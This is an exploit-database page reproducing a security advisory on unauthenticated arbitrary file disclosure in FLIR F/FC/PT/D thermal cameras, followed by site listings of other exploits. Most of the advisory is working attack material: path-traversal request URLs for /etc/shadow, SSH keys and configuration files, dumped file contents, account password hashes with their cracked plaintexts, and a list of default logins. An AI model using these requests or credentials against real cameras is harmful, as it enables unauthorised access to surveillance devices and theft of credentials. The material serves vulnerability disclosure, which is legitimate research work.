Menu

Search for hundreds of thousands of exploits

"FLIR Thermal Camera F/FC/PT/D - Information Disclosure"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2017-09-25

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures


Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
                  Software version: 10.0.2.43
                  Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
                  FC-Series S (FC-334-NTSC)
                  FC-Series ID
                  FC-Series R
                  PT-Series (PT-334 200562)
                  D-Series
                  F-Series

Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
provide full 640x480 thermal resolution.

Desc: Input passed thru several parameters is not properly verified before
being used to read files. This can be exploited by an unauthenticated attacker
to read arbitrary files from local resources.

==============================================================================
/var/www/data/controllers/api/xml.php:
--------------------------------------

68:    private function readFile($file)
69:    {
70:        if (!empty($file) && file_exists($file)) {
71:            $xml = file_get_contents($file);
72:            $this->setVar('result', $xml);
73:            $this->loadView('webservices/default');
74:        }
75:        else {
76:            $this->loadPageNotFound();
77:        }
78:    }

==============================================================================


Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
           Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
           Nexus Server/2.5.29.0
           Nexus Server/2.5.14.0
           Nexus Server/2.5.13.0
           lighttpd/1.4.28
           PHP/5.4.7


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5434
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5434.php


23.03.2017

--


Requests:

GET http://TARGET/api/xml?file=/var/www/data/modules/legacy/config.php HTTP/1.1

Output:
=====================================================================

<?php
$configFile = "config.ini";
// load configuration params
$config = parse_ini_file($configFile);
if (!$config || count($config) == 0 || !isset($config["dir_nexus"]))
   die("error loading configuration file...");

// TODO if don't exist configuration, create config.ini according system and nexus setup

// global
define ("BASE",       $config["dir_nexus"]);
define ("BIN",        $config["dir_bin"]);
define ("TMP_DIR",    $config["dir_tmp"]);
define ("SERVER_DIR", $config["dir_server"]);
define ("CONF_DIR",   $config["dir_conf"]);
define ("WEB_DIR",      "/web/");
define ("TOOLS_DIR",    "/tools/");
define ("HARDWARE_DIR", "/hardware/");
define ("BACKUPS_DIR",  "/backups/");
define ("BACKUPS_INI_DIR",  BACKUPS_DIR . "ini_files/");
define ("BACKUPS_SYS_DIR",  BACKUPS_DIR . "system_files/");

// server files
define ("INI_FILE",        "/server/conf/server.ini");
define ("INI_DEFAULTS", "factory.defaults");
define ("LOG_FILE",        "server.log");
define ("LOG_DEFAULT_PATH","/server/logs");
define ("SCANLIST_DEFAULT_PATH","/server/sl");
define ("LIC_FILE",        "/server/license/license.txt");
define ("ZOOM_LUT_FILE",   "/server/conf/zoom_lut.txt");
define ("DICTIONARY_FILE", "/server/conf/dictionary.txt");
define ("PELOC_D_FILE",    "/server/conf/PelcoD.map");
define ("FIRMWARE_FILE",    "firmware.sh");
define ("HARDWARE_FILE",   BASE."/hardware/hardware.cfg");

// server ini
define ("INI_SECTION_DEVICES", "Devices");
define ("INI_SECTION_DEVICES_IDS", " Ids");
define ("INI_SECTION_DEVICES_INTERFACE", "INTERFACE");
define ("INI_SECTION_INTERFACE", INI_SECTION_DEVICES_INTERFACE . " Configuration - Device ");

// nexus cgi
define ("NEXUSCGI_DEFAULTPORT", 0);
define ("NEXUSCGI_TYPE", "Nexus CGI Interface");

// web
define ("USERS_FILE", "config/app/users.txt");
define ("WEBVERSION", "3.4.0.0");
define ("RECOMENDEDSERVERVERSION", "2.5.13.0");

// xml files
define ("devicesFOLDER","devices");
define ("configFOLDER","configuration");
define ("driversFOLDER","drivers");

// system
// TODO
define ("UNZIP","/usr/bin/unzip");
define ("ZIP","/usr/bin/zip");
define ("SUDO", $config["sudo"]);
define ("FLIRSYS", $config["flir_system"]);
define ("FLIRSTP", $config["flir_setup"]);
define ("CONFSRC", $config["config_source_dir"]);
define ("INISRC", $config["config_source_ini_dir"]);
define ("LOCK_FILE", "/server/conf/.locked");

// service
define ("START",  SUDO . $config["service_start"]);
define ("STOP",   SUDO . $config["service_stop"]);
define ("STATUS", SUDO . $config["service_status"]);

// server file
define ("SERVER_FILE", SERVER_DIR . "bin/" .$config["server_file"]);
define ("STARTUP_FILE", $config["startup_file"]);
define ("BOOT_FILE", $config["boot_file"]);

define ('LINE_FEED', "\n");

// help
define ("HELP_FILES", $config["help_files"]);

// Debug mode
define("DEBUG", $config["debug_mode"]);
?>
=====================================================================


Other file requests:
--------------------

http://TARGET/api/xml?file=/etc/passwd
http://TARGET/api/xml?file=/etc/shadow
http://TARGET/api/xml?file=/proc/version
http://TARGET/api/xml?file=/root/.ssh/authorized_keys
http://TARGET/api/xml?file=/var/www/lighttpd.conf
http://TARGET/api/xml?file=../../../../../../../../../etc/passwd
http://TARGET/api/file/download/etc/shadow
http://TARGET/api/file/download/etc/passwd
http://TARGET/api/file/content/etc/shadow
http://TARGET/api/file/content/var/log/messages
http://TARGET/api/server/videosnap?file=../../../../../../etc/passwd
http://TARGET/onvif/device_service
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/MessagingConfig.xml
http://TARGET/api/server/status/full
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/FC-334-NTSC.ini
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/scheduler.xml
http://TARGET/page/maintenance/view/server-lan
http://TARGET/api/xml?file=/tmp/SW_versions.txt
http://TARGET/api/xml?file=/usr/local/nexus/hardware/hardware.cfg
http://TARGET/api/file/ini/read



The clear.sh script:
--------------------

http://TARGET/api/xml?file=/var/www/data/config/app/clear.sh


Output:
=====================================================================

#!/bin/bash

########

# is web root
if [ ! -f "index.php" ]
then
    echo "please, run from web root"
    exit -1
fi

# delete old files with spaces
echo "deleting deprecated files (with spaces, ampersand and/or dots)"
find . -name "* *" -print0 | xargs -0 rm -f

echo

# files to delete (deprecated, old...)
FILES_TODETELE="webroot/images/models/
webroot/js/old/
FLIRish.php
footer.html.php
getCgiPort.php
global_functions.php
headerNavigation.php
index-login
isUserogged.php
log_users.php
mobile-loading.php
mobile-meta
testApifile.php
unauthorized.php
users.txt
wizard.php
api/
bundle/
conf/
config/app/clientdesc
config/app/update-files.sh
config/boot_settings.json
config/config.ini
flirfiles/
help/
js/
livevideo/
maintenance/
modules/legacy/
setup/
styles/
tmp/user_permissions.json
xmlfiles/
views/main/maintenance/files-extra.php
webroot/images/mobile/
webroot/images/livevideo/
webroot/images/advancedBottom.png
webroot/images/advancedMiddle.png
webroot/images/advancedTop.png
webroot/images/arrowUpMini.png
webroot/images/bgBottom.png
webroot/images/bgButton.png
webroot/images/bgButtonOn.png
webroot/images/bgFullBottom.png
webroot/images/bgFullMiddle.png
webroot/images/bgFullTop.png
webroot/images/bgMiddle.png
webroot/images/bgTop.png
webroot/images/bottomBar.png
webroot/images/flir.ico
webroot/images/leftMenuButton.png
webroot/images/_logoFlirMini
webroot/images/logoFlir.png
webroot/images/logoFlirMini.png
webroot/images/radio.png
webroot/images/tabBackground.png
webroot/css/flir.base.css
webroot/css/flir.ie.css
webroot/css/flir.maintenance.css
webroot/css/flir.mobile.css
webroot/css/flir.setup.css
webroot/css/flir.video.css
webroot/css/flir.wizard.css
webroot/css/jquery/jquery.jscrollpane.css
webroot/css/jquery/jquery-ui-1.8.7.custom.css
webroot/js/PIE_uncompressed.js
webroot/js/jquery/jquery-1.5.1.min.js
webroot/js/jquery/jquery-1.5.min.js
webroot/js/jquery/plugins/jquery.ba-dotimeout.js
webroot/js/jquery/plugins/jquery.dd.js
webroot/js/jquery/plugins/jquery.forms.js
webroot/js/jquery/plugins/jquery.i18n.properties-1.0.9.js
webroot/js/jquery/plugins/jquery.jscrollpane.js
webroot/js/jquery/plugins/jquery.mousewheel.js
webroot/js/jquery/plugins/jquery.touchable.js
webroot/js/jquery/plugins/jquery.touchable.js.orig
webroot/xml/host_types.xml
webroot/xml/devices/em
webroot/xml/devices/foveal
webroot/xml/devices/foveus/foveus_Foveus.xml
webroot/xml/devices/foveus/foveus_PTZ35x140.xml
webroot/xml/devices/foveus/foveus_Voyager.xml
webroot/xml/devices/geo/geo_Georeference.xml
webroot/xml/devices/gyro/gyro_TCM2.6.xml
webroot/xml/devices/i2c
webroot/xml/devices/interface/interface_Genetec.xml
webroot/xml/devices/interface/interface_ONVIF.xml
webroot/xml/devices/ir/ir_Microcore275Z.xml
webroot/xml/devices/ir/ir_Thermovision-2000.xml
webroot/xml/devices/ir/ir_Thermovision-3000.xml
webroot/xml/devices/onboard/onboard_LTC2990.xml
webroot/xml/devices/onboard/onboard_LTC2991.xml
webroot/xml/devices/osd/osd_BOB3.xml
webroot/xml/devices/pelco/pelco_PELCO_D.xml
webroot/xml/devices/pharos/pharos_Pharos.xml
webroot/xml/devices/plat/plat_Sagebrush.xml
webroot/xml/devices/plat/plat_Vehicle.xml
webroot/xml/devices/tass/tass_TASS.xml
webroot/xml/devices/video/video_Pleora.xml
webroot/xml/devices/visca/visca_VISCA.xml
webroot/xml/devices/thermostate
webroot/xml/devices/tvi"

# delete files
echo "clearing files"
for oldfile in $FILES_TODETELE
do
    echo "deleting $oldfile"
    rm -rf $oldfile
done

echo

######

exit 0
=====================================================================



Disclosing usernames and hashes:
--------------------------------

http://TARGET/api/xml?file=/var/www/data/config/app/users.txt


user=ee11cbb19052e40b07aac0ca060c23ee
expert=b9b83bad6bd2b4f7c40109304cf580e1
admin=15f9a55de61622e9c2a61ce72663dc08
production=c8348b2fb046ff758256b3a5eadb4a8c
calibration=11df08a6fb66c9ae4eab03ba7db123b0

ee11cbb19052e40b07aac0ca060c23ee MD5 : user
b9b83bad6bd2b4f7c40109304cf580e1 MD5 : expert
15f9a55de61622e9c2a61ce72663dc08 MD5 : fliradmin
c8348b2fb046ff758256b3a5eadb4a8c MD5 : flirproduction
11df08a6fb66c9ae4eab03ba7db123b0 MD5 : flircal

Default credentials:

user:user
expert:expert
admin:fliradmin
production:flirproduction
calibration:flircal


http://TARGET/api/xml?file=/usr/local/nexus/server/conf/admin.passwd

AeRMh9wBkCS9k


Product info:
-------------

http://TARGET/api/system/config/product

{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-27 "Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root" remote hardware LiquidWorm
2020-10-27 "GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse" remote hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure" webapps hardware LiquidWorm
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected